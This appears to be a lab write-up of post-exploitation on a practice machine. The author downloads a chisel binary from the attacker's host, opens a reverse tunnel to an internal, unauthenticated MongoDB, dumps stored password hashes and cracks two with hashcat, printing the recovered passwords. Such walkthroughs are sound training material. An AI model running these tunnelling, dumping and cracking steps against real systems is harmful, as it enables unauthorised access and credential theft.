MongoDB

Upon gaining an initial foothold, I identified the presence of a Docker instance running with the IP address 172.17.0.2.

This aligns with the earlier speculation about an internal host, which was hinted at in the todo note file.

www-data@ubuntu:/var/tmp$ cat /etc/ufw/user.rules
 
[...REDACTED...]
 
### tuple ### allow tcp 80 0.0.0.0/0 any 0.0.0.0/0 in
-A ufw-user-input -p tcp --dport 80 -j ACCEPT
 
### tuple ### allow any 27017 127.0.0.1 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 127.0.0.1 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 127.0.0.1 --dport 27017 -j ACCEPT
 
### tuple ### allow any 27017 172.17.0.2 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 172.17.0.2 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 172.17.0.2 --dport 27017 -j ACCEPT
 
### tuple ### allow tcp 6000:6007 0.0.0.0/0 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -m multiport --dports 6000:6007 -j ACCEPT

A review of the firewall configuration (/etc/ufw/user.rules) provides further insight into network traffic flow. The rules indicate that traffic to and from port 27017 is permitted, specifically allowing outbound connections to both 127.0.0.1 and 172.17.0.2. There is also a running docker-proxy process that forwards to the MongoDB service (27017) running on the Docker host (172.17.0.2).

Additionally, an examination of the routing table confirms that the current host is part of the 172.17.0.0/24 network, reinforcing the likelihood that the service is being accessed from within the Docker environment rather than directly on the target system itself.

Tunneling

Given the MongoDB instance is only accessible from within the target system, the network socket must be tunneled

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ chisel server -p 6004 --reverse 
2025/03/09 23:54:22 server: Reverse tunnelling enabled
2025/03/09 23:54:22 server: Fingerprint x8SJNrFTzT27rru9u/spzWu+joVnsK3aH20po74QHm0=
2025/03/09 23:54:22 server: Listening on http://0.0.0.0:6004

Starting a Chisel server on Kali port 6004, so that the target system is able to reach

www-data@ubuntu:/var/tmp$ wget -q http://192.168.45.218:6006/chiselx64 ; chmod 755 ./chiselx64

Delivery complete over HTTP

www-data@ubuntu:/var/tmp$ ./chiselx64 client --fingerprint 'x8SJNrFTzT27rru9u/spzWu+joVnsK3aH20po74QHm0=' 192.168.45.218:6004 R:27017:127.0.0.1:27017 &
 
[1] 10362
2025/03/09 22:54:48 client: Connecting to ws://192.168.45.218:6004
2025/03/09 22:54:48 client: Fingerprint x8SJNrFTzT27rru9u/spzWu+joVnsK3aH20po74QHm0=
2025/03/09 22:54:48 client: Connected (Latency 25.914345ms)

Tunneling Kali port 27017 to the target host’s 127.0.0.1:27017 socket

Session established. All the traffic will be routed through the chisel server on the Kali port 6004

mongo client

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ mongo mongodb://127.0.0.1:27017/      
MongoDB shell version v7.0.14
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("05409fbc-3ee0-44f8-8831-aa66f8dea8d7") }
MongoDB server version: 4.4.3
WARNING: shell and server versions do not match
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
---
The server generated these startup warnings when booting: 
        2024-08-03T00:16:58.022+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
        2024-08-03T00:16:58.518+00:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
---
>

Connected to the target MongoDB instance

> show dbs
admin   0.000GB
config  0.000GB
local   0.000GB
staffs  0.000GB

The staffs DB is the only none default database

`admin` and `config` DBs

> db.system.version.find()
{ "_id" : "featureCompatibilityVersion", "version" : "4.4" }
> use config
switched to db config
> show collections
system.sessions
> db.system.sessions.find()
{ "_id" : { "id" : UUID("9d98fb48-3e71-4b9b-9c10-7f33026fa70a"), "uid" : BinData(0,"47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=") }, "lastUse" : ISODate("2025-03-09T22:36:55.832Z") }
{ "_id" : { "id" : UUID("05409fbc-3ee0-44f8-8831-aa66f8dea8d7"), "uid" : BinData(0,"47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=") }, "lastUse" : ISODate("2025-03-09T22:56:55.827Z") }
{ "_id" : { "id" : UUID("a08ccf23-0fb7-43c3-8682-bd36d8845f98"), "uid" : BinData(0,"47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=") }, "lastUse" : ISODate("2025-03-09T22:56:55.827Z") }

Both admin and config DBs are default and rather empty

`local` DB

> use local
switched to db local
> show collections
startup_log
> db.startup_log.find()
{ "_id" : "85b45169ebbf-1614087432397", "hostname" : "85b45169ebbf", "startTime" : ISODate("2021-02-23T13:37:12Z"), "startTimeLocal" : "Tue Feb 23 13:37:12.397", "cmdLine" : { "net" : { "bindIp" : "*" } }, "pid" : NumberLong(1), "buildinfo" : { "version" : "4.4.3", "gitVersion" : "913d6b62acfbb344dde1b116f4161360acd8fd13", "modules" : [ ], "allocator" : "tcmalloc", "javascriptEngine" : "mozjs", "sysInfo" : "deprecated", "versionArray" : [ 4, 4, 3, 0 ], "openssl" : { "running" : "OpenSSL 1.1.1  11 Sep 2018", "compiled" : "OpenSSL 1.1.1  11 Sep 2018" }, "buildEnvironment" : { "distmod" : "ubuntu1804", "distarch" : "x86_64", "cc" : "/opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.2.0", "ccflags" : "-fno-omit-frame-pointer -fno-strict-aliasing -fasynchronous-unwind-tables -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp", "cxx" : "/opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.2.0", "cxxflags" : "-Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17", "linkflags" : "-pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,-z,origin -Wl,--enable-new-dtags", "target_arch" : "x86_64", "target_os" : "linux", "cppdefines" : "SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS" }, "bits" : 64, "debug" : false, "maxBsonObjectSize" : 16777216, "storageEngines" : [ "biggie", "devnull", "ephemeralForTest", "wiredTiger" ] } }
{ "_id" : "85b45169ebbf-1614087541430", "hostname" : "85b45169ebbf", "startTime" : ISODate("2021-02-23T13:39:01Z"), "startTimeLocal" : "Tue Feb 23 13:39:01.430", "cmdLine" : { "net" : { "bindIp" : "*" } }, "pid" : NumberLong(1), "buildinfo" : { "version" : "4.4.3", "gitVersion" : "913d6b62acfbb344dde1b116f4161360acd8fd13", "modules" : [ ], "allocator" : "tcmalloc", "javascriptEngine" : "mozjs", "sysInfo" : "deprecated", "versionArray" : [ 4, 4, 3, 0 ], "openssl" : { "running" : "OpenSSL 1.1.1  11 Sep 2018", "compiled" : "OpenSSL 1.1.1  11 Sep 2018" }, "buildEnvironment" : { "distmod" : "ubuntu1804", "distarch" : "x86_64", "cc" : "/opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.2.0", "ccflags" : "-fno-omit-frame-pointer -fno-strict-aliasing -fasynchronous-unwind-tables -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp", "cxx" : "/opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.2.0", "cxxflags" : "-Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17", "linkflags" : "-pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,-z,origin -Wl,--enable-new-dtags", "target_arch" : "x86_64", "target_os" : "linux", "cppdefines" : "SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS" }, "bits" : 64, "debug" : false, "maxBsonObjectSize" : 16777216, "storageEngines" : [ "biggie", "devnull", "ephemeralForTest", "wiredTiger" ] } }
{ "_id" : "85b45169ebbf-1614089472125", "hostname" : "85b45169ebbf", "startTime" : ISODate("2021-02-23T14:11:12Z"), "startTimeLocal" : "Tue Feb 23 14:11:12.125", "cmdLine" : { "net" : { "bindIp" : "*" } }, "pid" : NumberLong(1), "buildinfo" : { "version" : "4.4.3", "gitVersion" : "913d6b62acfbb344dde1b116f4161360acd8fd13", "modules" : [ ], "allocator" : "tcmalloc", "javascriptEngine" : "mozjs", "sysInfo" : "deprecated", "versionArray" : [ 4, 4, 3, 0 ], "openssl" : { "running" : "OpenSSL 1.1.1  11 Sep 2018", "compiled" : "OpenSSL 1.1.1  11 Sep 2018" }, "buildEnvironment" : { "distmod" : "ubuntu1804", "distarch" : "x86_64", "cc" : "/opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.2.0", "ccflags" : "-fno-omit-frame-pointer -fno-strict-aliasing -fasynchronous-unwind-tables -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp", "cxx" : "/opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.2.0", "cxxflags" : "-Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17", "linkflags" : "-pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,-z,origin -Wl,--enable-new-dtags", "target_arch" : "x86_64", "target_os" : "linux", "cppdefines" : "SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS" }, "bits" : 64, "debug" : false, "maxBsonObjectSize" : 16777216, "storageEngines" : [ "biggie", "devnull", "ephemeralForTest", "wiredTiger" ] } }
{ "_id" : "85b45169ebbf-1722644218546", "hostname" : "85b45169ebbf", "startTime" : ISODate("2024-08-03T00:16:58Z"), "startTimeLocal" : "Sat Aug  3 00:16:58.546", "cmdLine" : { "net" : { "bindIp" : "*" } }, "pid" : NumberLong(1), "buildinfo" : { "version" : "4.4.3", "gitVersion" : "913d6b62acfbb344dde1b116f4161360acd8fd13", "modules" : [ ], "allocator" : "tcmalloc", "javascriptEngine" : "mozjs", "sysInfo" : "deprecated", "versionArray" : [ 4, 4, 3, 0 ], "openssl" : { "running" : "OpenSSL 1.1.1  11 Sep 2018", "compiled" : "OpenSSL 1.1.1  11 Sep 2018" }, "buildEnvironment" : { "distmod" : "ubuntu1804", "distarch" : "x86_64", "cc" : "/opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.2.0", "ccflags" : "-fno-omit-frame-pointer -fno-strict-aliasing -fasynchronous-unwind-tables -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp", "cxx" : "/opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.2.0", "cxxflags" : "-Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17", "linkflags" : "-pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,-z,origin -Wl,--enable-new-dtags", "target_arch" : "x86_64", "target_os" : "linux", "cppdefines" : "SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS" }, "bits" : 64, "debug" : false, "maxBsonObjectSize" : 16777216, "storageEngines" : [ "biggie", "devnull", "ephemeralForTest", "wiredTiger" ] } }

The startup_log collection within the local DB reveals some information about the Docker host, 85b45169ebbf.

`staffs` DB

> use staffs
switched to db staffs
> show collections
ssh_login
> db.ssh_login.find()
{ "_id" : ObjectId("603505584a98f28de50cc0f4"), "name" : "root", "pw_hash" : "5ff837a98703011de7d0a576ca9a84be6f9e4a798329423c8200beabd0f178656591fdac53ff785e71062dd2473d6dc1bb822a7dce1fc626ee44855466f3c8e1", "role" : "dev" }
{ "_id" : ObjectId("603505584a98f28de50cc0f5"), "name" : "carlos", "pw_hash" : "20132c01e17d4267d316fbfd721becd6a2656b061b365a5d76efdefb386d74a489ebe323bb65fecfe7404aef00f574e6fcce668f0f358ea7bc12c9ef25eb7804", "role" : "manager" }
{ "_id" : ObjectId("603505584a98f28de50cc0f6"), "name" : "enox", "pw_hash" : "216572a4d605f2805f918ba0d6b1ade045076832d7bb5476d7ede7d9159121b88edb398d28b470df263d8d2a710e86f27f1a27e66137efae46cb47de87916cee", "role" : "admin" }

The staffs DB contains the ssh_login collection that includes credentials of 3 users

This was noted in the note file

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ hashcat --show ./hashes.txt                                       
 
      # | Name                                                       | Category
  ======+============================================================+======================================
   1700 | SHA2-512                                                   | Raw Hash
  17600 | SHA3-512                                                   | Raw Hash
  11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian           | Raw Hash
  18000 | Keccak-512                                                 | Raw Hash
   6100 | Whirlpool                                                  | Raw Hash
   1770 | sha512(utf16le($pass))                                     | Raw Hash
  21000 | BitShares v0.x - sha512(sha512_bin(pass))                  | Cryptocurrency Wallet
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ hashcat -a 0 -m 1700 ./hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 3 digests; 3 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Host memory required for this attack: 3 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
216572a4d605f2805f918ba0d6b1ade045076832d7bb5476d7ede7d9159121b88edb398d28b470df263d8d2a710e86f27f1a27e66137efae46cb47de87916cee:bagabaga
5ff837a98703011de7d0a576ca9a84be6f9e4a798329423c8200beabd0f178656591fdac53ff785e71062dd2473d6dc1bb822a7dce1fc626ee44855466f3c8e1:1oyindamola
 
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1700 (SHA2-512)
Hash.Target......: ./hashes.txt
Time.Started.....: Mon Mar 10 00:07:48 2025 (2 secs)
Time.Estimated...: Mon Mar 10 00:07:50 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  6521.0 kH/s (0.55ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/3 (66.67%) Digests (total), 2/3 (66.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[216361726f6c796e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 32%
 
Started: Mon Mar 10 00:07:30 2025
Stopped: Mon Mar 10 00:07:51 2025

2 password hashes were cracked:

enox:bagabaga
root:1oyindamola

The root account’s credential will be tested

InfoSec LAB

Explorer

Phobos_MongoDB_Docker

MongoDB

Tunneling

mongo client

`admin` and `config` DBs

`local` DB

`staffs` DB

Password Cracking

Interactive Graph View

Table of Contents

Backlinks

InfoSec LAB

Explorer

Phobos_MongoDB_Docker

MongoDB

Tunneling

mongo client

admin and config DBs

local DB

staffs DB

Password Cracking

Interactive Graph View

Table of Contents

Backlinks

`admin` and `config` DBs

`local` DB

`staffs` DB